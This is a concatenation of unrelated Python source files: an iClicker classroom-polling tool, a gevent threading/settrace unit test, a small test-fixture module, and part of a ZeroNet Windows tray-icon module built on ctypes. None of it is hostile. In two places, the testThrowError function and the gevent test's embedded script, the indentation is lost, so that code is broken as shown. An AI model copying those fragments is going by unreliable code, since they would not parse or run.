        # Set our buffer to the appropriate string, and if our buffer hasn't
        # changed, just exit--we don't even need to update the screen
        if string == self.screen_buffer[line] and force_update is False:
            return
        self.screen_buffer[line] = string
        self.screen_queue[line] = True
        def process_screen_queue(line):
            # if the screenqueue is false, it means another thread already handled updating
            # the screen for us
            if self.screen_queue[line] is False:
                return
            # Make sure we don't send two write commands too frequently.
            # If we have tried to send a command too recently, start a
            # timer that retries after the remaining cool-down interval.
            curr_time = time.time()
            if curr_time - self.last_set_screen_time < MIN_SCREEN_UPDATE_TIME:
                delay_duration = (MIN_SCREEN_UPDATE_TIME - (curr_time - self.last_set_screen_time))
                timer = threading.Timer(delay_duration, process_screen_queue, [line])
                timer.start()
                return
            # If the last write wasn't too recent, let's do it!
            self.screen_queue[line] = False
            self._set_screen(line)
        process_screen_queue(line)
class Response(object):
    """A single clicker vote: who clicked, what they answered, and when."""
    def __init__(self, clicker_id=None, response=None, click_time=None, seq_num=None, command=None):
        # default the timestamp to "now" when the caller did not supply one
        self.click_time = time.time() if click_time is None else click_time
        if command is not None:
            # the raw Command packet is accepted but currently unused
            pass
        self.clicker_id = clicker_id
        self.response = response
        self.seq_num = seq_num
    def _key(self):
        # click_time is deliberately excluded: two identical presses compare equal
        return (self.clicker_id, self.response, self.seq_num)
    def __eq__(self, other):
        if type(other) is not Response:
            return False
        return self._key() == other._key()
    def __ne__(self, other):
        return not self.__eq__(other)
    def __repr__(self):
        return "{0}: {1} ({2} at {3})".format(self.clicker_id, self.response, self.seq_num, self.click_time)
class IClickerPoll(object):
    """Runs a poll on an IClickerBase: collects votes, tallies them and
    keeps the base unit's LCD display up to date."""
    def __init__(self, iclicker_base):
        self.base = iclicker_base
        self.STOP_POLL = False          # flag watched by the polling loops
        self.should_print = True        # echo each vote to stdout
        self.poll_start_time = 0
        # clicker_id -> list of Response objects, in arrival order
        self.responses = defaultdict(list)
    def update_display(self):
        """ updates the base display according to the poll results """
        # Write the distribution of votes to the second line of the display
        out_string = " 0  0  0  0  0 "
        recent_responses = self.get_most_recent_responses()
        tally = Counter(r.response for r in recent_responses if r.response != 'F') #'F' means retract answer
        if len(tally) > 0:
            # percentage of A..E among all counted votes
            total = sum(tally.values())
            out_string = "{0}  {1}  {2}  {3}  {4}".format(int(100*tally['A']/total),
                                                          int(100*tally['B']/total),
                                                          int(100*tally['C']/total),
                                                          int(100*tally['D']/total),
                                                          int(100*tally['E']/total))
        self.base.set_screen(out_string, line=1)
        # Write the time and number of total votes to the first line of the display
        secs = int(time.time() - self.poll_start_time)
        mins = secs // 60
        secs = secs % 60
        out_string_time = "{0}:{1:02}".format(mins, secs)
        # right-align the vote count on the 16-character line
        out_string = "{0}{1:>{padding}}".format(out_string_time, sum(tally.values()), padding=(16-len(out_string_time)))
        self.base.set_screen(out_string, line=0)
    def start_poll(self, poll_type='alpha'):
        """ Starts a poll and then starts watching input """
        if not self.base.has_initialized:
            self.base.initialize()
        self.STOP_POLL = False
        self.poll_start_time = time.time()
        self.poll_type = poll_type
        self.base.start_poll(poll_type)
        # This blocks until self.STOP_POLL is set to true
        self.watch_input()
        # After watch input exits, we want to stop the poll
        self.stop_poll()
    def stop_poll(self):
        # also terminates watch_input() and the display-update thread
        self.STOP_POLL = True
        self.base.stop_poll()
    def watch_input(self):
        """ Constantly polls the usb device for clicker responses """
        self.display_update_loop()
        while self.STOP_POLL is False:
            response = self.base.read(50)
            # if there is no response, do nothing but update the display
            if response is None:
                continue
            # a 64-byte packet may carry up to two 32-byte votes
            for info in response.response_info():
                self.add_response(Response(info['clicker_id'], info['response'],
                                           time.time(), info['seq_num']))
            self.update_display()
    def display_update_loop(self, interval=1):
        """ Spawns a new thread and updates the display every @interval
            number of seconds """
        def update():
            while self.STOP_POLL is False:
                self.update_display()
                time.sleep(interval)
        display_thread = threading.Thread(target=update)
        display_thread.start()
    def add_response(self, response):
        """ Adds a response to the response list """
        # duplicate packets (USB retransmits) are dropped via Response.__eq__
        if response not in self.responses[response.clicker_id]:
            self.responses[response.clicker_id].append(response)
            self.print_response(response)
    def get_most_recent_responses(self):
        """ returns a list of the most recent responses """
        # only the latest vote per clicker counts
        return [self.responses[key][-1] for key in self.responses.keys()]
    def get_most_recent_responses_formatted(self):
        """ returns a csv formatted string containing all the responses for
            each clicker ID """
        recent_responses = self.get_most_recent_responses()
        out = ['{0},{1}'.format(r.clicker_id, r.response) for r in recent_responses]
        return '\n'.join(out)
    def print_response(self, response):
        if self.should_print:
            print(response)
# This is a callback that stops the poll, since start a poll is a blocking operation
def close_pole(poll):
    """Signal/timer callback: announce and stop the running poll."""
    print("Stopping Poll")
    poll.stop_poll()
if __name__ == '__main__':
    import argparse
    import re
    import signal
    parser = argparse.ArgumentParser(description='Start an iClicker poll')
    parser.add_argument('--debug', action='store_true', default=False,
                        help='Display debug information about the USB transactions')
    parser.add_argument('--type', type=str, default='alpha',
                        help='Sets the poll type to alpha, numeric, or alphanumeric')
    parser.add_argument('--duration', type=str, default='100m0s',
                        help='Sets the duration of the poll in minutes and seconds. 0m0s is unlimited.')
    parser.add_argument('--dest', type=str, default='',
                        help='Sets the file to save polling data to.')
    parser.add_argument('--frequency', type=str, default='aa',
                        help='Sets the two base-station frequency codes. Should be formatted as two letters (e.g., \'aa\' or \'ab\')')
    args = parser.parse_args()
    #
    # Process all the arguments
    #
    if args.debug:
        log.setLevel(0)
    if args.type in ['alpha', 'numeric', 'alphanumeric']:
        poll_type = args.type
    else:
        raise ValueError("Poll type must be 'alpha', 'numeric', or 'alphanumeric', not '{0}'".format(args.type))
    # BUG FIX: --duration used to be ignored (poll_duration was hard-coded
    # to 1000).  Parse the documented "<minutes>m<seconds>s" format;
    # a total of 0 seconds (e.g. "0m0s") means unlimited.
    match = re.fullmatch(r'(\d+)m(\d+)s', args.duration)
    if match is None:
        raise ValueError("Duration '{0}' is not valid; expected e.g. '5m30s'".format(args.duration))
    poll_duration = int(match.group(1)) * 60 + int(match.group(2))
    if args.frequency:
        freq1 = args.frequency[0].lower()
        freq2 = args.frequency[1].lower()
        if freq1 not in ('a', 'b', 'c', 'd') or freq2 not in ('a', 'b', 'c', 'd'):
            raise ValueError("Frequency combintation '{0}{1}' is not valid".format(freq1, freq2))
    #
    # Initiate the polling
    #
    print('Finding iClicker Base')
    base = IClickerBase()
    base.get_base()
    print('Initializing iClicker Base')
    base.initialize(freq1, freq2)
    # If we have successfully started a poll, set up a signal handler
    # to clean up when we get a SIGINT (ctrl+c or kill) command
    poll = IClickerPoll(base)
    signal.signal(signal.SIGINT, lambda *x: close_pole(poll))
    # Set a callback to stop the poll after the desired amount of time
    stop_timer = None
    if poll_duration:
        stop_timer = threading.Timer(poll_duration, lambda *x: close_pole(poll))
        stop_timer.start()
    print('Poll Started')
    poll.start_poll(poll_type)
    # If we made it this far and stop_timer wasn't triggered, we were asked to stop another
    # way, so we should stop the stop_timer.
    # BUG FIX: guard the cancel -- with an unlimited duration no timer
    # exists and the unconditional cancel raised NameError.
    if stop_timer is not None:
        stop_timer.cancel()
    if args.dest:
        file_name = args.dest
        print('Writing results to {0}'.format(file_name))
        with open(file_name, 'w') as out_file:
            out_file.write(poll.get_most_recent_responses_formatted())
|
test__threading_vs_settrace.py | from __future__ import print_function
import sys
import subprocess
import unittest
from gevent.thread import allocate_lock
import gevent.testing as greentest
script = """
from gevent import monkey
monkey.patch_all()
import sys, os, threading, time
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
time.sleep(0.1)
sys.stdout.write('..program blocked; aborting!')
sys.stdout.flush()
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
def trace(frame, event, arg):
if threading is not None:
threading.currentThread()
return trace
def doit():
sys.stdout.write("..thread started..")
def test1():
t = threading.Thread(target=doit)
t.start()
t.join()
sys.settrace(None)
sys.settrace(trace)
if len(sys.argv) > 1:
test1()
sys.stdout.write("..finishing..")
"""
class TestTrace(unittest.TestCase):
    """Checks that gevent's lock implementation interacts correctly with
    sys.settrace, both in-process and in a monkey-patched subprocess."""
    @greentest.skipOnPurePython("Locks can be traced in Pure Python")
    def test_untraceable_lock(self):
        # Untraceable locks were part of the solution to https://bugs.python.org/issue1733757
        # which details a deadlock that could happen if a trace function invoked
        # threading.currentThread at shutdown time---the cleanup lock would be held
        # by the VM, and calling currentThread would try to acquire it again. The interpreter
        # changed in 2.6 to use the `with` statement (https://hg.python.org/cpython/rev/76f577a9ec03/),
        # which apparently doesn't trace in quite the same way.
        if hasattr(sys, 'gettrace'):
            old = sys.gettrace()
        else:
            old = None
        lst = []
        try:
            def trace(frame, ev, _arg):
                lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
                print("TRACE: %s:%s %s" % lst[-1])
                return trace
            # entering/exiting the lock must NOT invoke the trace function
            with allocate_lock():
                sys.settrace(trace)
        finally:
            # always restore the previous trace function
            sys.settrace(old)
        self.assertEqual(lst, [], "trace not empty")
    @greentest.skipOnPurePython("Locks can be traced in Pure Python")
    def test_untraceable_lock_uses_different_lock(self):
        if hasattr(sys, 'gettrace'):
            old = sys.gettrace()
        else:
            old = None
        lst = []
        # we should be able to use unrelated locks from within the trace function
        l = allocate_lock()
        try:
            def trace(frame, ev, _arg):
                with l:
                    lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
                # print("TRACE: %s:%s %s" % lst[-1])
                return trace
            l2 = allocate_lock()
            sys.settrace(trace)
            # Separate functions, not the C-implemented `with` so the trace
            # function gets a crack at them
            l2.acquire()
            l2.release()
        finally:
            sys.settrace(old)
        # Have an assert so that we know if we miscompile
        self.assertTrue(lst, "should not compile on pypy")
    @greentest.skipOnPurePython("Locks can be traced in Pure Python")
    def test_untraceable_lock_uses_same_lock(self):
        from gevent.hub import LoopExit
        if hasattr(sys, 'gettrace'):
            old = sys.gettrace()
        else:
            old = None
        lst = []
        e = None
        # we should not be able to use the same lock from within the trace function
        # because it's over acquired but instead of deadlocking it raises an exception
        l = allocate_lock()
        try:
            def trace(frame, ev, _arg):
                with l:
                    lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
                return trace
            sys.settrace(trace)
            # Separate functions, not the C-implemented `with` so the trace
            # function gets a crack at them
            l.acquire()
        except LoopExit as ex:
            e = ex
        finally:
            sys.settrace(old)
        # Have an assert so that we know if we miscompile
        self.assertTrue(lst, "should not compile on pypy")
        self.assertTrue(isinstance(e, LoopExit))
    def run_script(self, more_args=()):
        # Run the module-level `script` in a fresh interpreter; exit code 2
        # means the watchdog fired (i.e. the child deadlocked).
        args = [sys.executable, "-c", script]
        args.extend(more_args)
        rc = subprocess.call(args)
        self.assertNotEqual(rc, 2, "interpreter was blocked")
        self.assertEqual(rc, 0, "Unexpected error")
    def test_finalize_with_trace(self):
        # no extra argv: the child only installs the trace and exits
        self.run_script()
    def test_bootstrap_inner_with_trace(self):
        # extra argv triggers test1(): starts and joins a traced thread
        self.run_script(["1"])
# Run via gevent's test runner when executed directly.
if __name__ == "__main__":
    greentest.main()
|
test.py |
import threading
import sys
# Major-version detection: sys.version begins with '2' or '3'.
is_py2 = sys.version[0] == '2'
if is_py2:
    # Python 2's Queue module was renamed to queue in Python 3.
    import Queue as queue
else:
    import queue as queue
def isScalar(x):
    """Return True when *x* is neither a list nor a tuple."""
    is_sequence = isinstance(x, (list, tuple))
    return not is_sequence
def isList(x):
    """Return True when *x* is a list (tuples do not count)."""
    return isinstance(x, list)
def asString(x):
    """Return the str() representation of *x*."""
    text = str(x)
    return text
def makeDict():
    """Return a fixture dict; insertion order is a, c, b."""
    return dict([('a', 1.0), ('c', 3.0), ('b', 2.0)])
def makeTuple():
    """Return the fixture tuple (1.0, 2.0, 3.0)."""
    return tuple([1.0, 2.0, 3.0])
def makeIterator(x):
    """Return an iterator over *x*."""
    iterator = iter(x)
    return iterator
def makeGenerator(n):
    """Yield the integers 0 .. n-1 one at a time."""
    counter = 0
    while counter < n:
        yield counter
        counter += 1
def iterateOnThread(iter):
    """Drain *iter* on a worker thread and return the collected items.

    The periodic ``join(0.1)`` keeps the calling thread responsive (e.g.
    to signals) while waiting.  The parameter name shadows the builtin
    ``iter``; it is kept for backward compatibility with keyword callers.
    """
    results = []
    def iteration_worker():
        for i in iter:
            results.append(i)
    thread = threading.Thread(target=iteration_worker)
    thread.start()
    # Fix: Thread.isAlive() was removed in Python 3.9; is_alive() exists
    # since Python 2.6, so this remains backward compatible.
    while thread.is_alive():
        thread.join(0.1)
    return results
def reflect(x):
    """Identity function: hand back the argument unchanged."""
    return x
def callFunc(f, *args, **kwargs):
    """Invoke *f* with the given positional and keyword arguments."""
    result = f(*args, **kwargs)
    return result
def testThrowError():
throwError()
def throwError():
raise ValueError('A very specific bad thing happened')
class PythonClass(object):
    """Fixture exposing two class attributes and a classmethod."""

    FOO = 1
    BAR = 2

    @classmethod
    def class_method(cls):
        """Return the FOO class attribute."""
        value = cls.FOO
        return value
class PythonCallable(object):
    """Call a callable

    Calling an instance returns its single argument unchanged.

    Args:
        arg1: First argument.
    """
    # Fix: the docstring above was originally placed *after* FOO/BAR, so
    # it was a stray string statement and __doc__ stayed None; it is now
    # in the canonical position.
    FOO = 1
    BAR = 2

    def __call__(self, arg1):
        return arg1


def create_callable():
    """Return a fresh PythonCallable instance."""
    return PythonCallable()


# Fixture dict exposing a callable under the key 'callable'.
dict_with_callable = dict(callable=create_callable())
|
notificationicon.py | # Pure ctypes windows taskbar notification icon
# via https://gist.github.com/jasonbot/5759510
# Modified for ZeroNet
import Queue  # used by NotificationIcon.pump (Queue.Empty); Python 2 module
import ctypes
import ctypes.wintypes
import os
import threading  # used by NotificationIcon._callback (main-thread liveness check)
import time
import uuid

import gevent
__all__ = ['NotificationIcon']
# Create popup menu
CreatePopupMenu = ctypes.windll.user32.CreatePopupMenu
CreatePopupMenu.restype = ctypes.wintypes.HMENU
CreatePopupMenu.argtypes = []
MF_BYCOMMAND = 0x0
MF_BYPOSITION = 0x400
MF_BITMAP = 0x4
MF_CHECKED = 0x8
MF_DISABLED = 0x2
MF_ENABLED = 0x0
MF_GRAYED = 0x1
MF_MENUBARBREAK = 0x20
MF_MENUBREAK = 0x40
MF_OWNERDRAW = 0x100
MF_POPUP = 0x10
MF_SEPARATOR = 0x800
MF_STRING = 0x0
MF_UNCHECKED = 0x0
InsertMenu = ctypes.windll.user32.InsertMenuW
InsertMenu.restype = ctypes.wintypes.BOOL
InsertMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR]
AppendMenu = ctypes.windll.user32.AppendMenuW
AppendMenu.restype = ctypes.wintypes.BOOL
AppendMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR]
SetMenuDefaultItem = ctypes.windll.user32.SetMenuDefaultItem
SetMenuDefaultItem.restype = ctypes.wintypes.BOOL
SetMenuDefaultItem.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT]
class POINT(ctypes.Structure):
    # Win32 POINT structure: screen coordinates in pixels.
    _fields_ = [('x', ctypes.wintypes.LONG),
                ('y', ctypes.wintypes.LONG)]
GetCursorPos = ctypes.windll.user32.GetCursorPos
GetCursorPos.argtypes = [ctypes.POINTER(POINT)]
SetForegroundWindow = ctypes.windll.user32.SetForegroundWindow
SetForegroundWindow.argtypes = [ctypes.wintypes.HWND]
TPM_LEFTALIGN = 0x0
TPM_CENTERALIGN = 0x4
TPM_RIGHTALIGN = 0x8
TPM_TOPALIGN = 0x0
TPM_VCENTERALIGN = 0x10
TPM_BOTTOMALIGN = 0x20
TPM_NONOTIFY = 0x80
TPM_RETURNCMD = 0x100
TPM_LEFTBUTTON = 0x0
TPM_RIGHTBUTTON = 0x2
TPM_HORNEGANIMATION = 0x800
TPM_HORPOSANIMATION = 0x400
TPM_NOANIMATION = 0x4000
TPM_VERNEGANIMATION = 0x2000
TPM_VERPOSANIMATION = 0x1000
TrackPopupMenu = ctypes.windll.user32.TrackPopupMenu
TrackPopupMenu.restype = ctypes.wintypes.BOOL
TrackPopupMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_void_p]
PostMessage = ctypes.windll.user32.PostMessageW
PostMessage.restype = ctypes.wintypes.BOOL
PostMessage.argtypes = [ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM]
DestroyMenu = ctypes.windll.user32.DestroyMenu
DestroyMenu.restype = ctypes.wintypes.BOOL
DestroyMenu.argtypes = [ctypes.wintypes.HMENU]
# Create notification icon
GUID = ctypes.c_ubyte * 16
class TimeoutVersionUnion(ctypes.Union):
    # NOTIFYICONDATA's uTimeout and uVersion share storage (Win32 union).
    _fields_ = [('uTimeout', ctypes.wintypes.UINT),
                ('uVersion', ctypes.wintypes.UINT),]
NIS_HIDDEN = 0x1
NIS_SHAREDICON = 0x2
class NOTIFYICONDATA(ctypes.Structure):
    # Mirrors the Win32 NOTIFYICONDATAW structure passed to Shell_NotifyIconW.
    def __init__(self, *args, **kwargs):
        super(NOTIFYICONDATA, self).__init__(*args, **kwargs)
        # Windows requires cbSize to hold the structure's byte size.
        self.cbSize = ctypes.sizeof(self)
    _fields_ = [
        ('cbSize', ctypes.wintypes.DWORD),
        ('hWnd', ctypes.wintypes.HWND),               # owner window for callbacks
        ('uID', ctypes.wintypes.UINT),                # app-chosen icon id
        ('uFlags', ctypes.wintypes.UINT),             # NIF_* mask of valid fields
        ('uCallbackMessage', ctypes.wintypes.UINT),   # message posted on icon events
        ('hIcon', ctypes.wintypes.HICON),
        ('szTip', ctypes.wintypes.WCHAR * 64),        # tooltip text
        ('dwState', ctypes.wintypes.DWORD),
        ('dwStateMask', ctypes.wintypes.DWORD),
        ('szInfo', ctypes.wintypes.WCHAR * 256),      # balloon body text
        ('union', TimeoutVersionUnion),
        ('szInfoTitle', ctypes.wintypes.WCHAR * 64),  # balloon title
        ('dwInfoFlags', ctypes.wintypes.DWORD),       # NIIF_* balloon icon flags
        ('guidItem', GUID),
        ('hBalloonIcon', ctypes.wintypes.HICON),
    ]
NIM_ADD = 0
NIM_MODIFY = 1
NIM_DELETE = 2
NIM_SETFOCUS = 3
NIM_SETVERSION = 4
NIF_MESSAGE = 1
NIF_ICON = 2
NIF_TIP = 4
NIF_STATE = 8
NIF_INFO = 16
NIF_GUID = 32
NIF_REALTIME = 64
NIF_SHOWTIP = 128
NIIF_NONE = 0
NIIF_INFO = 1
NIIF_WARNING = 2
NIIF_ERROR = 3
NIIF_USER = 4
NOTIFYICON_VERSION = 3
NOTIFYICON_VERSION_4 = 4
Shell_NotifyIcon = ctypes.windll.shell32.Shell_NotifyIconW
Shell_NotifyIcon.restype = ctypes.wintypes.BOOL
Shell_NotifyIcon.argtypes = [ctypes.wintypes.DWORD, ctypes.POINTER(NOTIFYICONDATA)]
# Load icon/image
IMAGE_BITMAP = 0
IMAGE_ICON = 1
IMAGE_CURSOR = 2
LR_CREATEDIBSECTION = 0x00002000
LR_DEFAULTCOLOR = 0x00000000
LR_DEFAULTSIZE = 0x00000040
LR_LOADFROMFILE = 0x00000010
LR_LOADMAP3DCOLORS = 0x00001000
LR_LOADTRANSPARENT = 0x00000020
LR_MONOCHROME = 0x00000001
LR_SHARED = 0x00008000
LR_VGACOLOR = 0x00000080
OIC_SAMPLE = 32512
OIC_HAND = 32513
OIC_QUES = 32514
OIC_BANG = 32515
OIC_NOTE = 32516
OIC_WINLOGO = 32517
OIC_WARNING = OIC_BANG
OIC_ERROR = OIC_HAND
OIC_INFORMATION = OIC_NOTE
LoadImage = ctypes.windll.user32.LoadImageW
LoadImage.restype = ctypes.wintypes.HANDLE
LoadImage.argtypes = [ctypes.wintypes.HINSTANCE, ctypes.wintypes.LPCWSTR, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.wintypes.UINT]
# CreateWindow call
WNDPROC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM)
DefWindowProc = ctypes.windll.user32.DefWindowProcW
DefWindowProc.restype = ctypes.c_int
DefWindowProc.argtypes = [ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM]
WS_OVERLAPPED = 0x00000000L
WS_POPUP = 0x80000000L
WS_CHILD = 0x40000000L
WS_MINIMIZE = 0x20000000L
WS_VISIBLE = 0x10000000L
WS_DISABLED = 0x08000000L
WS_CLIPSIBLINGS = 0x04000000L
WS_CLIPCHILDREN = 0x02000000L
WS_MAXIMIZE = 0x01000000L
WS_CAPTION = 0x00C00000L
WS_BORDER = 0x00800000L
WS_DLGFRAME = 0x00400000L
WS_VSCROLL = 0x00200000L
WS_HSCROLL = 0x00100000L
WS_SYSMENU = 0x00080000L
WS_THICKFRAME = 0x00040000L
WS_GROUP = 0x00020000L
WS_TABSTOP = 0x00010000L
WS_MINIMIZEBOX = 0x00020000L
WS_MAXIMIZEBOX = 0x00010000L
WS_OVERLAPPEDWINDOW = (WS_OVERLAPPED |
WS_CAPTION |
WS_SYSMENU |
WS_THICKFRAME |
WS_MINIMIZEBOX |
WS_MAXIMIZEBOX)
SM_XVIRTUALSCREEN = 76
SM_YVIRTUALSCREEN = 77
SM_CXVIRTUALSCREEN = 78
SM_CYVIRTUALSCREEN = 79
SM_CMONITORS = 80
SM_SAMEDISPLAYFORMAT = 81
WM_NULL = 0x0000
WM_CREATE = 0x0001
WM_DESTROY = 0x0002
WM_MOVE = 0x0003
WM_SIZE = 0x0005
WM_ACTIVATE = 0x0006
WM_SETFOCUS = 0x0007
WM_KILLFOCUS = 0x0008
WM_ENABLE = 0x000A
WM_SETREDRAW = 0x000B
WM_SETTEXT = 0x000C
WM_GETTEXT = 0x000D
WM_GETTEXTLENGTH = 0x000E
WM_PAINT = 0x000F
WM_CLOSE = 0x0010
WM_QUERYENDSESSION = 0x0011
WM_QUIT = 0x0012
WM_QUERYOPEN = 0x0013
WM_ERASEBKGND = 0x0014
WM_SYSCOLORCHANGE = 0x0015
WM_ENDSESSION = 0x0016
WM_SHOWWINDOW = 0x0018
WM_CTLCOLOR = 0x0019
WM_WININICHANGE = 0x001A
WM_SETTINGCHANGE = 0x001A
WM_DEVMODECHANGE = 0x001B
WM_ACTIVATEAPP = 0x001C
WM_FONTCHANGE = 0x001D
WM_TIMECHANGE = 0x001E
WM_CANCELMODE = 0x001F
WM_SETCURSOR = 0x0020
WM_MOUSEACTIVATE = 0x0021
WM_CHILDACTIVATE = 0x0022
WM_QUEUESYNC = 0x0023
WM_GETMINMAXINFO = 0x0024
WM_PAINTICON = 0x0026
WM_ICONERASEBKGND = 0x0027
WM_NEXTDLGCTL = 0x0028
WM_SPOOLERSTATUS = 0x002A
WM_DRAWITEM = 0x002B
WM_MEASUREITEM = 0x002C
WM_DELETEITEM = 0x002D
WM_VKEYTOITEM = 0x002E
WM_CHARTOITEM = 0x002F
WM_SETFONT = 0x0030
WM_GETFONT = 0x0031
WM_SETHOTKEY = 0x0032
WM_GETHOTKEY = 0x0033
WM_QUERYDRAGICON = 0x0037
WM_COMPAREITEM = 0x0039
WM_GETOBJECT = 0x003D
WM_COMPACTING = 0x0041
WM_COMMNOTIFY = 0x0044
WM_WINDOWPOSCHANGING = 0x0046
WM_WINDOWPOSCHANGED = 0x0047
WM_POWER = 0x0048
WM_COPYDATA = 0x004A
WM_CANCELJOURNAL = 0x004B
WM_NOTIFY = 0x004E
WM_INPUTLANGCHANGEREQUEST = 0x0050
WM_INPUTLANGCHANGE = 0x0051
WM_TCARD = 0x0052
WM_HELP = 0x0053
WM_USERCHANGED = 0x0054
WM_NOTIFYFORMAT = 0x0055
WM_CONTEXTMENU = 0x007B
WM_STYLECHANGING = 0x007C
WM_STYLECHANGED = 0x007D
WM_DISPLAYCHANGE = 0x007E
WM_GETICON = 0x007F
WM_SETICON = 0x0080
WM_NCCREATE = 0x0081
WM_NCDESTROY = 0x0082
WM_NCCALCSIZE = 0x0083
WM_NCHITTEST = 0x0084
WM_NCPAINT = 0x0085
WM_NCACTIVATE = 0x0086
WM_GETDLGCODE = 0x0087
WM_SYNCPAINT = 0x0088
WM_NCMOUSEMOVE = 0x00A0
WM_NCLBUTTONDOWN = 0x00A1
WM_NCLBUTTONUP = 0x00A2
WM_NCLBUTTONDBLCLK = 0x00A3
WM_NCRBUTTONDOWN = 0x00A4
WM_NCRBUTTONUP = 0x00A5
WM_NCRBUTTONDBLCLK = 0x00A6
WM_NCMBUTTONDOWN = 0x00A7
WM_NCMBUTTONUP = 0x00A8
WM_NCMBUTTONDBLCLK = 0x00A9
WM_KEYDOWN = 0x0100
WM_KEYUP = 0x0101
WM_CHAR = 0x0102
WM_DEADCHAR = 0x0103
WM_SYSKEYDOWN = 0x0104
WM_SYSKEYUP = 0x0105
WM_SYSCHAR = 0x0106
WM_SYSDEADCHAR = 0x0107
WM_KEYLAST = 0x0108
WM_IME_STARTCOMPOSITION = 0x010D
WM_IME_ENDCOMPOSITION = 0x010E
WM_IME_COMPOSITION = 0x010F
WM_IME_KEYLAST = 0x010F
WM_INITDIALOG = 0x0110
WM_COMMAND = 0x0111
WM_SYSCOMMAND = 0x0112
WM_TIMER = 0x0113
WM_HSCROLL = 0x0114
WM_VSCROLL = 0x0115
WM_INITMENU = 0x0116
WM_INITMENUPOPUP = 0x0117
WM_MENUSELECT = 0x011F
WM_MENUCHAR = 0x0120
WM_ENTERIDLE = 0x0121
WM_MENURBUTTONUP = 0x0122
WM_MENUDRAG = 0x0123
WM_MENUGETOBJECT = 0x0124
WM_UNINITMENUPOPUP = 0x0125
WM_MENUCOMMAND = 0x0126
WM_CTLCOLORMSGBOX = 0x0132
WM_CTLCOLOREDIT = 0x0133
WM_CTLCOLORLISTBOX = 0x0134
WM_CTLCOLORBTN = 0x0135
WM_CTLCOLORDLG = 0x0136
WM_CTLCOLORSCROLLBAR = 0x0137
WM_CTLCOLORSTATIC = 0x0138
WM_MOUSEMOVE = 0x0200
WM_LBUTTONDOWN = 0x0201
WM_LBUTTONUP = 0x0202
WM_LBUTTONDBLCLK = 0x0203
WM_RBUTTONDOWN = 0x0204
WM_RBUTTONUP = 0x0205
WM_RBUTTONDBLCLK = 0x0206
WM_MBUTTONDOWN = 0x0207
WM_MBUTTONUP = 0x0208
WM_MBUTTONDBLCLK = 0x0209
WM_MOUSEWHEEL = 0x020A
WM_PARENTNOTIFY = 0x0210
WM_ENTERMENULOOP = 0x0211
WM_EXITMENULOOP = 0x0212
WM_NEXTMENU = 0x0213
WM_SIZING = 0x0214
WM_CAPTURECHANGED = 0x0215
WM_MOVING = 0x0216
WM_DEVICECHANGE = 0x0219
WM_MDICREATE = 0x0220
WM_MDIDESTROY = 0x0221
WM_MDIACTIVATE = 0x0222
WM_MDIRESTORE = 0x0223
WM_MDINEXT = 0x0224
WM_MDIMAXIMIZE = 0x0225
WM_MDITILE = 0x0226
WM_MDICASCADE = 0x0227
WM_MDIICONARRANGE = 0x0228
WM_MDIGETACTIVE = 0x0229
WM_MDISETMENU = 0x0230
WM_ENTERSIZEMOVE = 0x0231
WM_EXITSIZEMOVE = 0x0232
WM_DROPFILES = 0x0233
WM_MDIREFRESHMENU = 0x0234
WM_IME_SETCONTEXT = 0x0281
WM_IME_NOTIFY = 0x0282
WM_IME_CONTROL = 0x0283
WM_IME_COMPOSITIONFULL = 0x0284
WM_IME_SELECT = 0x0285
WM_IME_CHAR = 0x0286
WM_IME_REQUEST = 0x0288
WM_IME_KEYDOWN = 0x0290
WM_IME_KEYUP = 0x0291
WM_MOUSEHOVER = 0x02A1
WM_MOUSELEAVE = 0x02A3
WM_CUT = 0x0300
WM_COPY = 0x0301
WM_PASTE = 0x0302
WM_CLEAR = 0x0303
WM_UNDO = 0x0304
WM_RENDERFORMAT = 0x0305
WM_RENDERALLFORMATS = 0x0306
WM_DESTROYCLIPBOARD = 0x0307
WM_DRAWCLIPBOARD = 0x0308
WM_PAINTCLIPBOARD = 0x0309
WM_VSCROLLCLIPBOARD = 0x030A
WM_SIZECLIPBOARD = 0x030B
WM_ASKCBFORMATNAME = 0x030C
WM_CHANGECBCHAIN = 0x030D
WM_HSCROLLCLIPBOARD = 0x030E
WM_QUERYNEWPALETTE = 0x030F
WM_PALETTEISCHANGING = 0x0310
WM_PALETTECHANGED = 0x0311
WM_HOTKEY = 0x0312
WM_PRINT = 0x0317
WM_PRINTCLIENT = 0x0318
WM_HANDHELDFIRST = 0x0358
WM_HANDHELDLAST = 0x035F
WM_AFXFIRST = 0x0360
WM_AFXLAST = 0x037F
WM_PENWINFIRST = 0x0380
WM_PENWINLAST = 0x038F
WM_APP = 0x8000
WM_USER = 0x0400
WM_REFLECT = WM_USER + 0x1c00
class WNDCLASSEX(ctypes.Structure):
    # Mirrors the Win32 WNDCLASSEXW structure used by RegisterClassExW.
    def __init__(self, *args, **kwargs):
        super(WNDCLASSEX, self).__init__(*args, **kwargs)
        # Windows requires cbSize to hold the structure's byte size.
        self.cbSize = ctypes.sizeof(self)
    _fields_ = [("cbSize", ctypes.c_uint),
                ("style", ctypes.c_uint),
                ("lpfnWndProc", WNDPROC),             # the window procedure callback
                ("cbClsExtra", ctypes.c_int),
                ("cbWndExtra", ctypes.c_int),
                ("hInstance", ctypes.wintypes.HANDLE),
                ("hIcon", ctypes.wintypes.HANDLE),
                ("hCursor", ctypes.wintypes.HANDLE),
                ("hBrush", ctypes.wintypes.HANDLE),
